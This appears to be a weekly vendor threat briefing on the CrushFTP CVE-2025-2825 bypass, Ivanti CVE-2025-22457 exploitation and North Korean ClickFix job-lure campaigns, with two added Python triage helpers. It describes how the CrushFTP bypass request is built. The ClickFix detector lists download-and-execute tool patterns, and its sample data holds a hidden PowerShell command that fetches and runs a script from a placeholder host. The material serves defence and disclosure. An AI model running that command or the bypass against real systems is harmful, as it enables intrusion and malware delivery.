Weekly Threat Briefing: Mar 31 - Apr 4, 2025


Every week, eSentire’s Threat Response Unit (TRU) compiles the following threat intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.


CrushFTP Authentication Bypass Vulnerability

Bottom Line: On March 28th, 2025, Proof-of-Concept (PoC) exploit code was released for CVE-2025-2825, a critical vulnerability within CrushFTP. As of April 1st, eSentire has identified real-world exploitation. It is crucial that organizations using CrushFTP upgrade to a secure version immediately.

On March 21st, CrushFTP disclosed CVE-2025-2825, a critical authentication bypass vulnerability that could allow an attacker to gain unauthorized access through remote, unauthenticated HTTP requests sent to the CrushFTP server. Exploitation attempts were observed soon after ProjectDiscovery released Proof-of-Concept (PoC) exploit code on March 28th.

CrushFTP is a widely used multi-protocol file transfer server. It facilitates file transfers via multiple protocols such as FTP, FTPES, SFTP, SCP, and HTTPS. On March 21st, CrushFTP alerted its customers about the critical authentication bypass vulnerability in the solution via email and issued a security update on the same day.

The vulnerability initially reported to CrushFTP by Outpost was assigned the CVE identifier CVE-2025-31161, but the lack of public disclosure led VulnCheck to assign CVE-2025-2825 to the same flaw on March 26th. Since then, CVE-2025-2825 has been the publicly recognized identifier for the vulnerability.

CVE-2025-2825 impacts CrushFTP versions 10.0.0 through 10.8.3 and versions 11.0.0 through 11.3.0. Successful exploitation would allow the theft of data stored on the vulnerable CrushFTP server. ProjectDiscovery states that exploiting the vulnerability is straightforward and requires minimal technical expertise.

An attacker only needs to craft an HTTP request with an AWS S3-style authorization header containing a valid username followed by a slash, together with an arbitrary CrushAuth cookie value that matches the c2f parameter, to breach the vulnerable CrushFTP server. The flaw resides in the loginCheckHeaderAuth() method of the code responsible for handling HTTP requests with S3-style authorization headers.

The vulnerability is patched in CrushFTP versions 10.8.4 and later, and 11.3.1 and later. CrushFTP's recommended mitigation is to update to a patched version of the server. CrushFTP stated that servers with the DMZ feature enabled are not affected by the vulnerability.

On March 30th, exploitation attempts were detected by the Shadowserver Foundation, which confirmed that 1,512 unpatched CrushFTP servers were exposed to the Internet. Since April 1st, eSentire has identified multiple cases involving attempted exploitation of CVE-2025-2825. eSentire has confirmed that either patching or enabling the DMZ feature successfully prevents compromise via the exploit.

Authentication bypass vulnerabilities in file transfer systems are highly concerning, as they grant threat actors a simple access point from which sensitive data may be stolen. The data-extortion group CL0p has previously targeted similar authentication bypass zero-day vulnerabilities in file transfer applications such as the Cleo Managed File Transfer (MFT) solution, the MOVEit File Transfer Application (FTA), GoAnywhere MFT, and Accellion FTA.

Organizations using CrushFTP server should perform a business impact analysis and upgrade to a secure version (10.8.4 or later, or 11.3.1 or later) promptly. If patching is not feasible, organizations should ensure the DMZ feature is enabled on the vulnerable server until the patches are applied.
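The following triage helper, added here as an example and not code from eSentire or CrushFTP, encodes the affected and fixed version ranges stated above so that an inventory of CrushFTP hosts can be checked consistently. The host list, the `assess()` and `minimum_fixed_version()` helpers and the status strings are assumptions made for this example; the version numbers are the ones given in the briefing.

```python
"""Exposure triage for CVE-2025-2825 using the version ranges in the briefing.
Added example; not eSentire or CrushFTP code."""
import re
from typing import List, Optional, Tuple

# Affected version ranges as stated in the briefing (inclusive on both ends).
AFFECTED_RANGES = [((10, 0, 0), (10, 8, 3)), ((11, 0, 0), (11, 3, 0))]
# First fixed release on each affected branch, as stated in the briefing.
FIXED_VERSIONS = [(10, 8, 4), (11, 3, 1)]


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse a 'major.minor.patch' string; anything after the third number is ignored."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised CrushFTP version string: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_affected_version(version: str) -> bool:
    """True when the version falls inside one of the affected ranges."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def assess(version: str, dmz_enabled: bool = False) -> str:
    """Classify one host. The briefing states DMZ-enabled servers are not affected,
    so a vulnerable version behind the DMZ feature is reported as mitigated."""
    if not is_affected_version(version):
        return "not-in-affected-range"
    return "mitigated-by-dmz" if dmz_enabled else "vulnerable"


def minimum_fixed_version(version: str) -> Optional[str]:
    """Return the first fixed release on the host's major branch, or None if unknown."""
    major = parse_version(version)[0]
    for fixed in FIXED_VERSIONS:
        if fixed[0] == major:
            return ".".join(str(n) for n in fixed)
    return None


def triage(hosts: List[dict]) -> List[dict]:
    """Annotate each inventory record with a status and the upgrade target."""
    results = []
    for h in hosts:
        status = assess(h["version"], h.get("dmz_enabled", False))
        results.append({**h, "status": status,
                        "upgrade_to": minimum_fixed_version(h["version"])})
    return results


# Constructed sample inventory (hostnames and versions are made up for the example).
SAMPLE_HOSTS = [
    {"host": "ftp-a.example.internal", "version": "10.8.3"},
    {"host": "ftp-b.example.internal", "version": "11.3.0", "dmz_enabled": True},
    {"host": "ftp-c.example.internal", "version": "11.3.1"},
]

if __name__ == "__main__":
    for r in triage(SAMPLE_HOSTS):
        print(f"{r['host']:28} {r['version']:8} {r['status']:22} upgrade_to={r['upgrade_to']}")
```

Hosts reported as "mitigated-by-dmz" still carry the vulnerable code and should stay on the patch list; the DMZ status only buys time, in line with the recommendation above.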

Here is how eSentire is responding to this threat:

Learn more in the full threat briefing here.


Critical Ivanti Connect Secure Vulnerability Exploited by China-Nexus Threat Actor

Bottom Line: A critical vulnerability in Ivanti Connect Secure, CVE-2025-22457, was observed being exploited by the Chinese state-sponsored APT group UNC5221 to gain initial access to victims' networks and deploy malware to further compromise them.

On April 3rd, 2025, Ivanti disclosed a critical vulnerability within the Ivanti Connect Secure VPN appliance, tracked as CVE-2025-22457 (CVSS: 9.0). CVE-2025-22457 is a stack-based buffer overflow vulnerability, which can lead to unauthenticated attackers achieving Remote Code Execution (RCE) when successfully exploited.

Within their advisory, Ivanti confirms that a security patch for the vulnerability was released on February 11th, 2025, and that the vulnerability impacts Ivanti Connect Secure versions 22.7R2.5 and earlier. Ivanti also confirms that it is aware of a limited number of customers whose Ivanti Connect Secure VPN appliances had been exploited at the time of disclosure, but does not share any details on the exploitation.

Ivanti indicates that the vulnerability was initially determined "not to be exploitable as remote code execution and didn’t meet the requirements of denial of service" but later learned that it is "exploitable through sophisticated means". 

Also on April 3rd, Mandiant released a report providing details on exploitation of CVE-2025-22457, which Mandiant says was first observed in March 2025 and attributes to the Chinese state-sponsored threat actor UNC5221. Mandiant assesses that UNC5221 may have reverse engineered the patch initially released for the vulnerability in February 2025, from which UNC5221 likely determined that exploitation of versions 22.7R2.5 and earlier was possible.

Upon successful exploitation, Mandiant reports that the newly identified malware families TrailBlaze and BrushFire were deployed through a shell script dropper, along with malware from the Spawn family. A shell script was first used to deploy TrailBlaze, an in-memory-only dropper that uses system calls to deploy additional payloads. TrailBlaze is used to drop BrushFire, a passive backdoor used to execute shellcode. The deployment of malware from the Spawn family, specifically SpawnSloth, SpawnSnare, and SpawnWave, was attributed to UNC5221 and has been observed in similar attacks.

Organizations are strongly urged to implement robust patch management strategies to ensure that updates to critical edge devices and infrastructure are applied in a timely manner.

Although there is currently no publicly available Proof-of-Concept (PoC) exploit code, which reduces the likelihood of widespread exploitation, organizations should apply relevant security patches to their Ivanti Connect Secure VPN appliance as soon as possible.

Plugins to identify versions of Ivanti Connect Secure vulnerable to CVE-2025-22457 via eSentire's Managed Vulnerability Service (MVS) are currently available.

Learn more in the full threat briefing here.


Recent DPRK Activity

Bottom Line: Recent reports on threat actors from the Democratic People's Republic of Korea (DPRK) provide new details on previously reported campaigns, specifically updates to the Contagious Interview campaign and the expansion of remote IT worker campaigns.

On March 31st, Sekoia released a report detailing a new campaign called ClickFake Interview. This campaign involves the use of fake job interview websites that utilize the ClickFix method to deploy the GolangGhost backdoor. Sekoia attributes this campaign to the North Korean APT group known as Lazarus, which is targeting centralized financial entities. The campaign was initially discovered during an investigation into Lazarus's attacks on the cryptocurrency industry. Sekoia believes that this new effort is a continuation of the Contagious Interview campaign previously reported by Palo Alto in 2023.

The ClickFake Interview campaign starts when a user receives a URL via social media, inviting them to a fake job interview website related to the cryptocurrency sector. The website prompts users to fill out a contact form and answer three open-ended questions about cryptocurrency.

Additionally, the site suggests recording an introductory video and preparing for the interview. When the victim is asked to enable their webcam, they encounter an error message instructing them to download a driver to resolve the issue. At this point the ClickFix technique is introduced: the victim is guided to open the Windows Run box and paste in a provided command line to "update the drivers". Running this command downloads a VBScript on Windows or a shell script on macOS, leading to the deployment of the GolangGhost backdoor.
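Because the ClickFix step described above relies on the victim pasting a command into the Windows Run box, the Run-box history (the RunMRU registry key under HKCU) is a useful place to look during triage. The script below, added here as an example and not eSentire code, scores RunMRU entries against a small set of download-and-execute indicators. The indicator list, the scoring threshold, the `triage()` helper and the sample registry values are assumptions constructed for this example; they are not indicators from the Sekoia report.

```python
"""Triage of Windows Run-box history (RunMRU) for ClickFix-style commands.
Added example; not eSentire code. Indicator patterns are assumptions drawn
from the generic ClickFix flow: a pasted command that fetches and runs a script."""
import re
from typing import Dict, List

# Assumed indicators. Two or more hits on one command is treated as worth a look.
INDICATORS = {
    "hidden-powershell": re.compile(r"powershell.*-w(indowstyle)?\s+h(idden)?", re.I),
    "remote-script-download": re.compile(r"(curl|wget|iwr|invoke-webrequest|downloadstring|bitsadmin)", re.I),
    "script-host": re.compile(r"\b(mshta|wscript|cscript)\b", re.I),
    "inline-exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "url": re.compile(r"https?://", re.I),
}


def parse_runmru(values: Dict[str, str]) -> List[str]:
    """Return Run-box commands newest-first.
    RunMRU stores each command under a single-letter value name with a trailing
    '\\1' marker, and the 'MRUList' value lists those letters most-recent first."""
    commands = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def score_command(cmd: str) -> List[str]:
    """Names of the indicators that match one command, sorted for stable output."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))


def triage(values: Dict[str, str], threshold: int = 2) -> List[dict]:
    """Commands from RunMRU that trip at least `threshold` indicators."""
    findings = []
    for cmd in parse_runmru(values):
        hits = score_command(cmd)
        if len(hits) >= threshold:
            findings.append({"command": cmd, "indicators": hits})
    return findings


# Constructed sample of exported RunMRU values (made up for the example; the
# domain is a placeholder). Entry "c" mimics a pasted driver-update lure.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": "powershell -w hidden -c \"iwr http://driver-update.example/fix.vbs "
         "-o %TEMP%\\fix.vbs; cscript %TEMP%\\fix.vbs\"\\1",
}

if __name__ == "__main__":
    for f in triage(SAMPLE_RUNMRU):
        print(f"[{', '.join(f['indicators'])}] {f['command']}")
```

On a live host the same dictionary can be populated from an export of `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`; the parsing and scoring do not change. Benign entries such as `notepad` or `calc` score zero and are never reported.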

GolangGhost is designed to steal sensitive web browser data, establish connections to Command-and-Control (C2) servers, and receive commands to perform further actions or execute additional payloads. It is important to note that on macOS, the FrostyFerret stealer is used to obtain the user's system password.

Google’s Threat Intelligence Group published a report highlighting that the remote IT worker campaigns associated with DPRK threat actors are expanding in both scope and scale. According to Google, the United States remains the primary target for DPRK remote worker scams. However, it has become increasingly difficult for these actors to secure employment due to the release of details about their campaigns and heightened vigilance among organizations. As a result, North Korean threat actors are increasingly turning their attention to European organizations, where they have experienced a higher success rate.

In recent campaigns, DPRK actors have applied for positions in various fields, including web development, bot development, content management system (CMS) development, and blockchain technology. These threat actors often claim to be based in countries such as Italy, Japan, Malaysia, Singapore, Ukraine, the United States, and Vietnam, using a combination of fabricated and stolen identities. Additionally, facilitators who assist DPRK workers in obtaining employment, receiving funds, and circumventing identity verification have been identified in both the United States and United Kingdom.

The eSentire Threat Response Unit continues to conduct threat hunts related to known DPRK campaigns. Additionally, detections are in place for malware commonly used by DPRK threat actors.

eSentire researchers have conducted in-depth investigations into DPRK activity observed by eSentire, leading to the publication of two reports, Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure Part 1 and Part 2. The eSentire Tactical Threat Response (TTR) team has developed detections for the ClickFix initial access vector (IAV) in eSentire MDR for Network.

The eSentire Threat Response Unit (TRU) has previously published an advisory and a TRU Positive blog on ClickFix distributing Lumma Stealer, which includes detailed instructions on how this type of attack can be prevented.

Learn more in the full threat briefing here.


About the eSentire Threat Response Unit (TRU)

Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.
